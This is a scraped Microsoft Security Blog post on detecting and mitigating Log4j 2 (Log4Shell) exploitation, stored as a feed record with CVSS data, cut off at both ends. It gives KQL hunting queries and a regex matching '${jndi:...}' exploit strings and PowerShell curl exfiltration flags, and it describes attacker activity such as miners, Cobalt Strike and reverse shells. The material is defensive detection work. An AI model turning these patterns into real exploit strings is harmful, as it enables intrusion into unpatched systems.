they could be related to Log4j exploitation:\n\n * Suspicious remote PowerShell execution \n * Download of file associated with digital currency mining \n * Process associated with digital currency mining \n * Cobalt Strike command and control detected \n * Suspicious network traffic connection to C2 Server \n * Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike) \n\nSome of the alerts mentioned above utilize the enhanced network inspection capabilities in Microsoft Defender for Endpoint. These alerts correlate several network and endpoint signals into high-confidence detection of successful exploitation, as well as providing detailed evidence artifacts valuable for triage and investigation of detected activities.\n\n\n\n_Figure 14. Example detection leveraging network inspection provides details about the Java class returned following successful exploitation_\n\n#### Microsoft Defender for Cloud Apps (previously Microsoft Cloud App Security)\n\nMicrosoft 365 Defender detects exploitation patterns in different data sources, including cloud application traffic reported by Microsoft Defender for Cloud Apps. The following alert surfaces exploitation attempts via cloud applications that use vulnerable Log4j components:\n\n * Log4j exploitation attempt via cloud application (previously titled Exploitation attempt against Log4j (CVE-2021-44228))\n\n\n\n_Figure 15. Microsoft 365 Defender alert &quot;Exploitation attempt against Log4j (CVE-2021-4428)&quot;_\n\n#### Microsoft Defender for Office 365\n\nTo add a layer of protection against exploits that may be delivered via email, Microsoft Defender for Office 365 flags suspicious emails (e.g., emails with the \u201cjndi\u201d string in email headers or the sender email address field), which are moved to the Junk folder.\n\nWe also added the following new alert, which detects attempts to exploit CVE-2021-44228 through email headers:\n\n * Log4j exploitation attempt via email (previously titled Log4j Exploitation Attempt \u2013 Email Headers (CVE-2021-44228))\n\n\n\n_Figure 16. __Sample alert on malicious sender display name found in email correspondence_\n\nThis detection looks for exploitation attempts in email headers, such as the sender display name, sender, and recipient addresses. The alert covers known obfuscation attempts that have been observed in the wild. If this alert is surfaced, customers are recommended to evaluate the source address, email subject, and file attachments to get more context regarding the authenticity of the email.\n\n\n\n_Figure 17. Sample email with malicious sender display name_\n\nIn addition, this email event as can be surfaced via advanced hunting:\n\n\n\n_Figure 18. Sample email event surfaced via advanced hunting _\n\n#### Microsoft 365 Defender advanced hunting queries\n\nTo locate possible exploitation activity, run the following queries:\n\n**Possible malicious indicators in cloud application events**\n\nThis query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts, however the results can be useful to identity attackers\u2019 details such as IP address, Payload string, Download URL, etc. \n \n \n CloudAppEvents\n | where Timestamp > datetime(\"2021-12-09\")\n | where UserAgent contains \"jndi:\" \n or AccountDisplayName contains \"jndi:\"\n or Application contains \"jndi:\"\n or AdditionalFields contains \"jndi:\"\n | project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields\n\n**Alerts related to Log4j vulnerability**\n\nThis query looks for alert activity pertaining to the Log4j vulnerability.\n \n \n AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation',\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt\n )\n\n**Devices with Log4j vulnerability alerts and additional other alert-related context**\n\nThis query surfaces devices with Log4j-related alerts and adds additional context from other alerts on the device. \n \n \n // Get any devices with Log4J related Alert Activity\n let DevicesLog4JAlerts = AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation'\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previouskly titled Log4j Exploitation Attempt\n )\n // Join in evidence information\n | join AlertEvidence on AlertId\n | where DeviceId != \"\"\n | summarize by DeviceId, Title;\n // Get additional alert activity for each device\n AlertEvidence\n | where DeviceId in(DevicesLog4JAlerts)\n // Add additional info\n | join kind=leftouter AlertInfo on AlertId\n | summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)\n\n**Suspected exploitation of Log4j vulnerability**\n\nThis query looks for exploitation of the vulnerability using known parameters in the malicious string. It surfaces exploitation but may surface legitimate behavior in some environments.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')\n //Removing FPs \n | where not(ProcessCommandLine has_any('stackstorm', 'homebrew')) \n\n**Regex to identify malicious exploit string**\n\nThis query looks for the malicious string needed to exploit this vulnerability.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}' \n or InitiatingProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}'\n\n**Suspicious process event creation from VMWare Horizon TomcatService**\n\nThis query identifies anomalous child processes from the _ws_TomcatService.exe_ process associated with the exploitation of the Log4j vulnerability in VMWare Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName has \"ws_TomcatService.exe\"\n | where FileName != \"repadmin.exe\"\n\n**Suspicious JScript staging comment**\n\nThis query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has \"VMBlastSG\"\n \n\n**Suspicious PowerShell curl flags**\n\nThis query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the \u201cBody\u201d argument are Base64-encoded results from an attacker-issued comment. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has_all(\"-met\", \"POST\", \"-Body\")\n\n### Microsoft Defender for Cloud\n\nMicrosoft Defender for Cloud\u2019s threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:\n\nOn Windows:\n\n * Detected obfuscated command line\n * Suspicious use of PowerShell detected\n\nOn Linux:\n\n * Suspicious file download\n * Possible Cryptocoinminer download detected\n * Process associated with digital currency mining detected\n * Potential crypto coin miner started\n * A history file has been cleared\n * Suspicious Shell Script Detected\n * Suspicious domain name reference\n * Digital currency mining related behavior detected\n * Behavior similar to common Linux bots detected\n\n### Microsoft Defender for IoT\n\nMicrosoft Defender for IoT has released a dedicated threat Intelligence update package for detecting Log4j 2 exploit attempts on the network (example below). \n\n\n\n_Figure 19. Microsoft Defender for IoT alert_ \n\nThe package is available for download from the [Microsoft Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Getting_Started>) (Click _Updates_, then _Download file _(MD5: 4fbc673742b9ca51a9721c682f404c41). \n\n\n\n_Figure 20. Microsoft Defender for IoT sensor threat intelligence update_\n\nMicrosoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release, [click here ](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes>)for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.\n\nWorking with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the [Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites>) by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the [documentation](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-work-with-threat-intelligence-packages>).\n\n### Microsoft Sentinel\n\nA new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel specific content to monitor, detect, and investigate signals related to exploitation of the CVE-2021-44228 vulnerability.\n\n\n\n_Figure 21. Log4j Vulnerability Detection solution in Microsoft Sentinel_\n\nTo deploy this solution, in the Microsoft Sentinel portal, select **Content hub (Preview)** under **Content Management**, then search for **Log4j** in the search bar. Select the **Log4j vulnerability detection** solution, and click **Install**. Learn how to [centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions](<https://docs.microsoft.com/azure/sentinel/sentinel-solutions-deploy>).\n\n\n\n_Figure 22. Microsoft Sentinel Analytics showing detected Log4j vulnerability_\n\nNote: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.\n\n#### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection queries to look for this activity:\n\n * [Possible exploitation of Apache Log4j component detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml>)\n\nThis hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.\n\n * [Cryptocurrency miners EXECVE](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/CryptoCurrencyMiners.yaml>)\n\nThis query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.\n\n * [Azure WAF Log4j CVE-2021-44228 hunting](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/AzureDiagnostics/WAF_log4j_vulnerability.yaml>)\n\nThis hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving Log4j vulnerability.\n\n * [Log4j vulnerability exploit aka Log4Shell IP IOC](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)\n\nThis hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.\n\n * [Suspicious shell script detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Suspicious_ShellScript_Activity.yaml>)\n\nThis hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.\n\n * [Azure WAF matching for ](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[ Log4j vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)\n\nThis query alerts on a positive pattern match by Azure WAF for CVE-2021-44228 Log4j exploitation attempt. If possible, it then decodes the malicious command for further analysis.\n\n * [Suspicious Base64 download activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Base64_Download_Activity.yaml>)\n\nThis hunting query helps detect suspicious encoded Base64 obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used to the Log4j vulnerability in order to evade detection and stay persistent in the network.\n\n * _[Linux security-related process termination activity detected ](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Process_Termination_Activity.yaml>)_\n\nThis query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise as seen recently to exploit the CVE-2021-44228 vulnerability.\n\n * [Suspicious manipulation of firewall detected via Syslog data](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Firewall_Disable_Activity.yaml>)\n\nThis query uses syslog data to alert on any suspicious manipulation of firewall to evade defenses. Attackers often perform such operations as seen recently to exploit the CVE-2021-44228 vulnerability for C2 communications or exfiltration.\n\n * [User agent search for Log4j exploitation attempt](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/UserAgentSearch_log4j.yaml>)\n\nThis query uses various log sources having user agent data to look for CVE-2021-44228 exploitation attempt based on user agent pattern.\n\n * [Network connections to LDAP port for CVE-2021-44228 vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NetworkConnectionldap_log4j.yaml>)\n\nThis hunting query looks for connection to LDAP port to find possible exploitation attempts for CVE-2021-44228.\n\n * [Linux toolkit detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Linux_Toolkit_Detected.yaml>)\n\nThis query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability\n\n * [Container miner activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Container_Miner_Activity.yaml>)\n\nThis query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining.\n\n * [Network connection to new external LDAP server](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/NetworkConnectionToNewExternalLDAPServer.yaml>)\n\nThis query looks for outbound network connections using the LDAP protocol to external IP addresses, where that IP address has not had an LDAP network connection to it in the 14 days preceding the query timeframe. This could indicate someone exploiting a vulnerability such as CVE-2021-44228 to trigger the connection to a malicious LDAP server.\n\n### Azure Firewall Premium \n\nCustomers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet. The vulnerability rulesets are continuously updated and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\n**Recommendation:** Customers are recommended to configure [Azure Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>) with both IDPS Alert &amp; Deny mode and TLS inspection enabled for proactive protection against **CVE-2021-44228** exploit. \n\n\n\n_Figure 23. Azure Firewall Premium portal_\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>). Customers new to Azure Firewall premium can learn more about [Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-features>).\n\n### Azure Web Application Firewall (WAF)\n\nIn response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0/1.1 available for Azure Front Door global deployments, and OWASP ModSecurity Core Rule Set (CRS) version 3.0/3.1 available for Azure Application Gateway V2 regional deployments.\n\nTo help detect and mitigate the Log2Shell vulnerability by inspecting requests\u2019 headers, URI, and body, we have released the following:\n\n * For Azure Front Door deployments, we have updated the rule **944240 \u201cRemote Command Execution\u201d** under Managed Rules\n * For Azure Application Gateway V2 regional deployments, we have introduced a new rule **Known-CVEs/800100** in the rule group Known-CVEs under Managed Rules\n\nThese rules are already enabled by default in block mode for all existing WAF Default Rule Set (DRS) 1.0/1.1 and OWASP ModSecurity Core Rule Set (CRS) 3.0/3.1 configurations. Customers using WAF Managed Rules would have already received enhanced protection for Log4j 2 vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) and [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)); no additional action is needed.\n\n**Recommendation**: Customers are recommended to enable WAF policy with Default Rule Set 1.0/1.1 on their Front Door deployments, or with OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1 on Application Gateway V2 to immediately enable protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1 or CRS 3.0/3.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.\n\n\n\n_Figure 24. Remote Code Execution rule for Default Rule Set (DRS) versions 1.0/1.1 _\n\n\n\n_Figure 25. Remote Code Execution rule for OWASP ModSecurity Core Rule Set (CRS) version 3.1_\n\nNote: The above protection is also available on Default Rule Set (DRS) 2.0 preview version and OWASP ModSecurity Core Rule Set (CRS) 3.2 preview version, which are available on Azure Front Door Premium and Azure Application Gateway V2 respectively. Customers using Azure CDN Standard from Microsoft can also turn on the above protection by enabling DRS 1.0.\n\nMore information about Managed Rules and Default Rule Set (DRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). More information about Managed Rules and OWASP ModSecurity Core Rule Set (CRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules>).\n\n## Indicators of compromise (IOCs)\n\nMicrosoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: [](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)[https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample Data/Feeds/Log4j_IOC_List.csv](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv>)\n\nMicrosoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.\n\n#### Revision history\n\n**_[01/19/2022] _**_New information about an unrelated vulnerability we discovered while investigating Log4j attacks_\n\n_**[01/11/2022]** New threat and vulnerability management capabilities to apply mitigation directly from the portal, as well as new advanced hunting queries _\n\n_**[01/10/2022] **Added new information about a China-based ransomware operator targeting internet-facing systems and deploying the NightSky ransomware_\n\n**_[01/07/2022] _**_Added a new rule group in _Azure Web Application Firewall (WAF)_ _\n\n**_[12/27/2021] _**_New capabilities in __threat and vulnerability management__ including a new advanced hunting schema and support for Linux, which requires updating the Microsoft Defender for Linux client; new Microsoft Defender for Containers solution._\n\n_**[12/22/2021]** Added new protections across Microsoft 365 Defender, including Microsoft Defender for Office 365._\n\n_**[12/21/2021]**_ _Added a note on testing services and assumed benign activity and additional guidance to use the **Need help?** button in the Microsoft 365 Defender portal._\n\n**_[12/17/2021] _**_New updates to observed activity, including more information about limited ransomware attacks and additional payloads; additional updates to protections from Microsoft 365 Defender and Azure Web Application Firewall (WAF), and new Microsoft Sentinel queries._\n\n_**[12/16/2021] **New Microsoft Sentinel solution and additional Microsoft Defender for Endpoint detections._\n\n_**[12/15/2021] **Details _about ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, including threat and vulnerability management._ _\n\n_**[12/14/2021] **New insights about multiple threat actors taking advantage of this vulnerability, _including nation-state actors and access brokers linked to ransomware._ _\n\nThe post [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T05:29:03", "type": "mssecure", "title": "Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-35247", "CVE-2021-44228", "CVE-2021-4428", "CVE-2021-44428", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-12T05:29:03", "id": "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "href": "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-01-19T21:30:14", "description": "**_January 10, 2022 recap \u2013_**_ The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers\u2019 software and services. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities._\n\n_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware._ _We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._\n\n_**January 19, 2022 update** - We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as \u201cLog4Shell\u201d ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) has presented a new attack vector and gained broad attention due to its severity and potential for widespread exploitation. The majority of attacks we have observed so far have been mainly mass-scanning, coin mining, establishing remote shells, and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.\n\nWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.\n\nMeanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.\n\nThis blog covers the following topics:\n\n 1. **Attack vectors and observed activity**\n 2. **Finding and remediating vulnerable apps and systems**\n * Threat and vulnerability management\n * Discovering affected components, software, and devices via a unified Log4j dashboard\n * Applying mitigation directly in the Microsoft 365 Defender portal\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for servers\n * Microsoft Defender for Containers\n * Microsoft Sentinel queries\n * RiskIQ EASM and Threat Intelligence\n 3. **Detecting and responding to exploitation attempts and other related attacker activity**\n * Microsoft 365 Defender\n * Microsoft Defender Antivirus\n * Microsoft Defender for Endpoint\n * Microsoft Defender for Cloud Apps\n * Microsoft Defender for Office 365\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for IoT\n * Microsoft Sentinel\n * Microsoft Sentinel queries\n * Azure Firewall Premium\n * Azure Web Application Firewall (WAF)\n 4. **Indicators of compromise (IoCs)**\n\n## Attack vectors and observed activity\n\nMicrosoft\u2019s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as \u201cLog4Shell\u201d.\n\nThe bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:\n\n\n\nAn attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.\n\nThe specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as \u201cldap\u201d, \u201cldaps\u201d, \u201crmi\u201d, \u201cdns\u201d, \u201ciiop\u201d, or \u201chttp\u201d, precedes the attacker domain.\n\nAs security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We\u2019ve seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts, such as the following, that are all trying to bypass string-matching detections:\n\n\n\nThe vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.\n\n### Exploitation continues on non-Microsoft hosted Minecraft servers\n\nMinecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.\n\nMicrosoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.\n\nIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\n\nWhile it\u2019s uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.\n\nDue to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n### Nation-state activity\n\nMSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerabilities to in-the-wild payload deployment, and exploitation against targets to achieve the actor\u2019s objectives.\n\nFor example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.\n\nIn addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.\n\n### Access brokers associated with ransomware\n\nMSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.\n\n### Mass scanning activity continues\n\nThe vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.\n\nMicrosoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.\n\n### Additional RAT payloads\n\nWe\u2019ve observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for 